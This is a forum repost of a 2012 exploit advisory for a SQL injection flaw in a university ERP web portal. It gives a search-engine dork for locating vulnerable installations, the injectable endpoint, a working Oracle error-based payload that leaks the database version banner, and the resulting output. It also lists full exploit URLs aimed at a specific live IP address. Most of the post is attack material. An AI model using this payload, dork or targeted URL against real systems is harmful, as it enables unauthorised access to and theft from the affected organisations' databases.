Jump to content
Praetorian503

Enterprise Resource Planning SQL Injection

Recommended Posts

Posted

The ERP (Enterprise Resource Planning) system from Sida University System suffers from a remote SQL injection vulnerability.



#Â Exploit Author: Shahram Darvishvand [karaji_kt21] Â <darvishvand.shahram[at]gmail[dot]com>
 # Exploit Title: [erp (Enterprise Resource plannin) SQL Injection Vulnerability ]
 # Vendor : sida university system
 # Date: [4/May/2012]

 # Google Dork:   "نرم Ø§ÙØ²Ø§Ø± جامع erp شامل قوانین Ú©Ù¾ÛŒ رایت Ù…ÛŒ باشد Ùˆ نوع نسخه بتا Ù…ÛŒ باشد"Â
 # Version: [ 1389/09/17 ]
 # Tested on: [ASHX .. Application powered by Oracle DBMS]
============================================================
** This Vulnerability Is On version 1389/09/17 **
--------------------------------------------
Exploit : Â http://[IP Or Domain]/Portal/WUC/daily.ashx?title=
=============================================================
Example : Â http://[IP Or Domain]/Portal/WUC/daily.ashx?title=
'or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--

Response :Â
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0Â -Â 64bit
==========================================================
[+] Greetz : Fahime.Saveh , Behrooz_IceÂ




********************************


For Screen shot 1 :

http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--


For Screen Shot 2 :
http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...